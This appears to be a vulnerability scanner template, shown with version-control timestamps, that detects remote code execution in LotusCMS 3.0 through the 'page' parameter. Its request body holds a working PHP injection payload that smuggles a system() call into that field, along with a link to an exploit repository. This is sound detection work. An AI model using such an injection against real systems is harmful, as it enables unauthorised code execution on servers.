2021-07-04 11:11:19 +00:00
id : lotuscms-rce
info :
2022-05-30 13:46:17 +00:00
name : LotusCMS 3.0 - Remote Code Execution
2021-07-04 11:11:19 +00:00
author : pikpikcu
severity : critical
2022-05-30 13:46:17 +00:00
description : LotusCMS 3.0 is susceptible to remote code execution via the Router () function. This is done by embedding PHP code in the 'page' parameter, which will be passed to a eval call, therefore allowing remote code execution.
2022-04-22 10:38:41 +00:00
reference :
- https://github.com/Hood3dRob1n/LotusCMS-Exploit
2022-05-30 13:46:17 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10.0
cve-id :
cwe-id : CWE-77
2021-07-04 11:11:19 +00:00
tags : lotuscms,rce
requests :
- method : POST
path :
- "{{BaseURL}}/index.php"
2021-07-04 11:39:45 +00:00
- "{{BaseURL}}/lcms/index.php"
2021-07-04 11:11:19 +00:00
headers :
Content-Type : application/x-www-form-urlencoded
body : |
2021-07-04 11:39:45 +00:00
page=index');${system('echo lotuscms_rce | md5sum')};#
2021-07-04 11:11:19 +00:00
matchers-condition : and
matchers :
- type : word
words :
2021-07-04 11:39:45 +00:00
- "38ee63071a04dc5e04ed22624c38e648"
2021-07-04 11:11:19 +00:00
part : body
- type : status
status :
2022-05-30 13:46:17 +00:00
- 200
# Enhanced by mp on 2022/05/30